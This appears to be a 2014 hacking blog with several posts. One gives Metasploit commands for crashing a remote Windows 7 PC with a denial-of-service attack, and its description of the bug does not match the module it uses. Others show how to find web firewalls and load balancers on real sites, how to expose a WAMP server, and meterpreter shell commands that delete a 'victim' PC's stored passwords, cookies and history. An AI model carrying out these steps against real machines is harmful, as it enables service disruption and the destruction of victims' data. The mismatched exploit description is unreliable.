Saturday, April 5, 2014

How to Perform Blue Screen Death Attack on Remote Windows 7 PC



This Metasploit module exploits vulnerability in win32k.sys where under specific conditions Track Popup Menu Ex will pass a NULL pointer to the MN End Menu State procedure. This Metasploit module has been tested successfully on Windows 7 SP0 and Windows 7 SP1

Now Open Kali Linux terminal type msfconsole


Now type use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options


msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.0.105
msf auxiliary(ms12_020_maxchannelids) > show options

msf auxiliary(ms12_020_maxchannelids) > exploit










Thursday, April 3, 2014

Firewall Detection Tool Wafw00f



Introduction

This is a Web Application Firewall Detection Tool.
The tool was written by – Sandro Gauci And G. Henrique.

It will help you detect the WAF ( Web Application Firewall )  behind the any domain.
Wiffit (Wafw00f ) can test for these Firewalls listed in the image -
If any firewall is detected from the list it will display on-screen

How Wiffit (Wafw00f) detects Web Application Firewall (WAF)
To detect WAF it looks for the following things :
  • Cookies
  • ServerCloaking
  • Response Codes
  • Drop Action
  • Pre Built-In Rules

How to Open Wiffit On Kali Linux

Applications > Kali Linux > Information Gathering > IDS/IPS Identification > wafw00f

wafw00f is open now , see the below image for more details -

How to use wafw00f

Example 1 :
Usage :
  1. root@root :
wafw00f [ target url ]
  1. Example :
wafw00f www.***.com
  1. This example shows that www.***.com is behind the Web Application Firewall.
  2. www.***.com is behind the Imperva WAF.


Example 2 :
  • Here google.com is also behind the WAF .
  • All these images shows these website are using IDS and it blocks my request all the time .


Example 3 :
  • Flipkart is also using WAF (Web Application Firewall)

Example 4 :wafw00f -a  http://www.google.com/
Nothing found there either.


Example 5 :wafw00f -l -t http://www.google.com/
Nothing found there either.


Wednesday, April 2, 2014

Load Balancing Detector (lbd)



Introduction

Load Balancing Detector (lbd) is a tool which checks, if a given domain use load balancing or not. This tool is mainly used by pentesters and hackers to checks site is dosable or not.

Objectives

In this tutorial we will learn how to use Load Balancing Detector (lbd).

Procedure

How to open it :-
Open lbd  through Kali Linux >> Information Gathering >> IDS IPS Identification
 >>  lbd

How to use it :-
·      To use it, you have to use this command usage: /usr/bin/lbd [domain]
·      This tool will first scans for DNS-Load Balancing and then HTTP-Load Balancing.
·      Atlast, it will show the result.
1: usage: root@VH0:~# /usr/bin/lbd  www.*********.com



1: usage: root@VH0:~# /usr/bin/lbd  www.google.com

Monday, March 31, 2014

How to Access WAMP Server in LAN or WAN


Introduction

The WAMP server is very useful and is widely used open source. It works great when you are working in a local machine. But when you want to access the same WAMP server form a different machine on LAN or WAN then it’s not possible.

Background 

Consider you are working in a team in a big project and each member of the team works in different modules and the same database. Issues arise when you merge files as well as the database. The best solution is to implement SVN on your server (for checking in and checking out files and folders etc.) and ask all team members tto access that server instance.

How to do this

Here are the steps to make WAM enabled on LAN or WAN:

Step 1

First you need to set up the WAMP service on your server and on the required services. And make sure that your WAMP server is online and it’s running on your browser using http://localhot:8081/ (I have given a fixed port number 8081 to my WAMP server).

To run the WAMP Apache server on your specified port, do the following. Go in the \wamp\bin\apache\Apache2.2.11\conf\httpd.conf file and search for “#Listen” and then change the port from 80 to 8081 and in that case, your URL will be http://localhost:8081/. Like below:
Collapse | Copy Code
#Listen 12.34.56.78:80
Listen 192.168.1.154:8081

Step 2

Now make the WMAP Server accessible in the LAN or WAN, you have to get \wamp\bin\apache\Apache2.2.11\conf\httpd.conf and open it and find the following code:
Collapse | Copy Code
<Directory "cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
   Deny from all
</Directory>
And change the above code to:
Collapse | Copy Code
<Directory "cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
   Allow from all
</Directory>

Step 3

Now you have to bind the server static IP to the port number (remember we gave done this in the start) so for this you have be on the same file and change “Listen 8081”  to “Listen [IP Address  of Server]:8081”. It will look  like “Listen 192.168.1.154:8081”.
Collapse | Copy Code
Listen 192.168.1.154:8081

Step 4

Great! The next step is to open port (8081) of the server such that everyone can access your server. This depends on which OS you are using. Like if you are using Windows Vista, then follow the below steps.
Open Control Panel  >> System and Security >> Windows Firewall then click on “Advance Setting” and then select “Inbound Rules” from the left panel and then click on “Add Rule…”. Select “PORT” as an option from the list and then in the next screen select “TCP” protocol and enter port number “8081” under “Specific local port” then click on the ”Next” button and select “Allow the Connection” and then give the general name and description to this port and click Done.
Now you are done with PORT opening as well.
Next is “Restart All Services” of WAMP and access your machine in LAN or WAN.


How to Delete Passwords/Cookies/History/Temp Internet File of Internet Explorer in Remote Victim PC Using Metasploit


Once you got the meterpreter session use ‘shell‘command to get command prompt of the target
Delete Temporary Internet Files
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8
Delete Cookies
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2

Delete History
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1

Delete From Data
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16

Delete Passwords
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32

Delete All
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255

Delete All + files and settings stored by Add-ons
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351


Contact Form

Name

Email *

Message *